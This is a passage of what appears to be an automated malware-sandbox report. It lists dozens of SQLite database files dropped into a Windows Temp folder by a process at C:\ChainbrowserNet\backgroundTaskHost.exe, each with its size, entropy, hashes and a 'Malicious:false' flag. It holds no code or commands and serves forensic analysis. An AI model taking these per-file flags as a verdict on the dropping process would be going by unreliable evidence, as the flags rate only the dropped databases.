                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\jCH0UTdShs

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\jECeC3oqS4

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\jWJyIG3pl7

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\jgINNbiuGL

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\kSs9c2TNjm

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\knwdJ34mOc

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\krXvJtbVlv

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\kylZ79YkZ2

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\l9NKPHlP0u

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\lJltrPz6EQ

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\lUrDpdxxLT

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\lbIoY9CclW

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\ldCARsFrQT

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\mYUY4PEGmj

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\mivPDBUVsT

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\mozmE8e9NO

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\n3ACo5s27P

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\nShcrOPWck

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\o2IwDEE6L7

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\oUqRmTIqGA

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\oex2TGg85z

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\onrwTYRObY

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\ozf3zdJEtm

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
